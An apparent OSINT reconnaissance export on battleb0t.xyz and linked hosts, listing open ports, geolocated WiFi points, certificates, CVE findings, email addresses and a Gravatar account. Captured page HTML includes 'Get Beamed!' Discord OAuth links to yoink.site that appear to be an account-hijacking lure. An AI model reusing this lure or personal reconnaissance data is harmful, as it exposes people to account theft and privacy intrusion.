| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | carymolinaro12@gmail.com | [{"platform": "Chrome", "version": "2.1", "data": {"entrypoints": {"window.addEventListener": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jstorage.min.js": [14, 15]}, "chrome.tabs.query": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [59, 82], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/popup.js": [13], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [34, 49]}, "chrome.runtime.onMessage": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/content.js": [367], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [4], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [21]}}, "risk": {"webstore": {"website": 1, "last_updated": 2, "users": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "retire": {"total": 110, "medium": 100, "low": 10}, "permissions": {"total": 30}, "total": 524, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "metadata": {}}, "extcalls": ["https://s.click.aliexpress.com/deep_link.htm?aff_short_key=_DClxvSL&dl_target_url=", "https://www.ebay.", "http://www.dropshipping-ebay.com", "https://", "https://www.google.com/analytics/web/inpage/pub/inpage.js?", "https://ssl.google-analytics.com/j/__utm.gif", "http://www.google-analytics.com", "https://www.google.%/ads/ga-audiences?", "http://www.google.com/"], "retire": [{"results": [{"detection": "filename", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", 
"http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://github.com/jquery/jquery.com/issues/162"], "identifiers": {"summary": "jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates"}, "severity": "low"}], "version": "2.2.4.min", "component": "jquery"}], "file": "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jquery-2.2.4.min.js"}], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "ohfgljdgelakfkefopgklcohadegdpjf": {"rating": 4.65096, "users": 3000000, "platform": "", "short_description": "Easy-to-use PDF tools to Edit, Convert, Merge, Split and Compress PDF files.", 
"icon": "https://lh3.googleusercontent.com/JeGWeZiGxLb3KWGAn6FWnAjCyJDsmC7lu_O_x-h8TpDGQRa_VBnOhh-Uxh_XocOgczrfiPO_hzR_MDCleFQJeyiMwg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2865, "name": "Smallpdf - Edit, Compress and Convert PDF"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "icnekagcncdgpdnpoecofjinkplbnocm": {"rating": 4.4411764, "users": 2000000, "platform": "", "short_description": "Read articles without distractions - use reader view. Make your reading process exceptional.", "icon": "https://lh3.googleusercontent.com/YBio0Hy33x3naSYfOCJBEMCntZexQLygzl17tRtLkxQXhR6esY8BtGoe7tgYNDmg3ZYAC2iTrQBdY-NVWXivPsn6r5A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34, "name": "Easyview Reader view"}, "fejgiddmdpgdmhhdjbophmflidmdpgdi": {"rating": 4.3333335, "users": 2000000, "platform": "", "short_description": "Increase audio volume up to 600% from the maximum! Boost your sound", "icon": "https://lh3.googleusercontent.com/0LHATIT-6LW9AX2Yy9uzoPDenL7TkUN-C_nsXHx9fODi7cQCp97p20zVArwcsk4UcocYknKLTd5Wyr6y4iW1q5T3hWE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Volume Booster Plus"}, "efaidnbmnnnibpcajpcglclefindmkaj": {"rating": 4.290437, "users": 10000000, "platform": "", "short_description": "Do more in Google Chrome with Adobe Acrobat PDF tools. 
View, fill, comment, sign, and try convert and compress tools.", "icon": "https://lh3.googleusercontent.com/aqahGz3euXadmtmp8NZnuKPoUm4cmewNY0AI1a_cMsC28cfvB2Bx3NArY9Mi50o2zF45Uh74Rmmq-Bh6dJRsVAbm=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34937, "name": "Adobe Acrobat: PDF edit, convert, sign tools"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "bpconcjcammlapcogcnnelfmaeghhagj": {"rating": 4.6261697, "users": 1000000, "platform": "", "short_description": "Record screencasts - record video from your screen. Screen Capture FULL Web page or any part. Edit screenshots.", "icon": "https://lh3.googleusercontent.com/VOnmhiXEBw4cIinxoJYNVSdqWr-xOchHol4frxQCitlE2mmsh1TByQ2zYNDv8sdyEP0lNrmwY4_FOi64MV1WQCnRS6U=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 16882, "name": "Nimbus Screenshot & Screen Video Recorder"}, "admmjipmmciaobhojoghlmleefbicajg": {"rating": 3.0946643, "users": 4000000, "platform": "", "short_description": "A cloud-based password manager that makes it easy to log in to your favorite sites.", "icon": "https://lh3.googleusercontent.com/uJX-GTxk93n7vQYuG55g9ULQFUknftFjN3ZAjbObhTQ3DIQlDHrcVfgfw7sLBpvSQDSl_Kv10WqpB1HvNUg9nWF_YQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1162, "name": "Norton Password Manager"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": 
"https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "bkkbcggnhapdmkeljlodobbkopceiche": {"rating": 4.7756734, "users": 2000000, "platform": "", "short_description": "Block popups, ads, cookie requests, trackers, notifications, ads on social media & more. A clean browsing experience starts today.", "icon": "https://lh3.googleusercontent.com/R9P6olNFUIkjebO_S6vG-1SulDiFYNVgtI8U-r3rm9Gq6TI__wd5ZIdeMxEB_9jL01MmRJve7CI28HLY18dJUOFibJs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 80784, "name": "Pop up blocker for Chrome\u2122 - Poper Blocker"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "mlomiejdfkolichcflejclcbmpeaniij": {"rating": 4.6202865, "users": 2000000, "platform": "", "short_description": "Ghostery is a powerful privacy extension. 
Block ads, stop trackers and speed up websites.", "icon": "https://lh3.googleusercontent.com/CpXOKuccvzh9oCG7G6NLr5nAvqUEdMLgfqWsYrKR92loF74N42s1B6LPtolnoVJphyP7WMTOtQRY7eAb2v61x1tOmQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 12836, "name": "Ghostery \u2013 Privacy Ad Blocker"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "fjgncogppolhfdpijihbpfmeohpaadpc": {"rating": 4.473016, "users": 2000000, "platform": "", "short_description": "Fast, one-click access to millions of research papers.", "icon": "https://lh3.googleusercontent.com/orDWHjYrSVYleMvmm7KTV9GHN_DcjWfOUKP6MVQ-JxjaW3BUF61B9Z2gPU__qY23z764gn7FLubSqYbcZZ8H_w3LJg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 315, "name": "EndNote Click - Formerly Kopernio"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you |
| 2023-05-12 03:10:05 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | ecash-pay.com | www.donation.ecash-pay.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:8C:21:AB) | 39.0469, -77.4903 |
| 2023-05-12 03:16:31 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 207.154.228.169 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | xfinitywifi (Net ID: 00:0D:67:65:A6:FB) | 32.8608, -79.9746 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2053 | 172.67.135.9 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00-evan.github.io |
| 2023-05-12 02:55:21 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 207.154.228.169:80 | 207.154.228.169 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_3.JPG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcalendars.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SF Library (Net ID: 00:02:2D:01:53:3D) | 37.7642, -122.3993 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.60): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B5:CA) | 37.7642, -122.3993 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | NSA (Net ID: 00:02:6F:24:1C:7D) | 32.8608, -79.9746 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://pics.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://battleb0t.xyz/./src/style.css?4 | https://battleb0t.xyz/ |
| 2023-05-12 02:50:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:06:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.111.153 |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
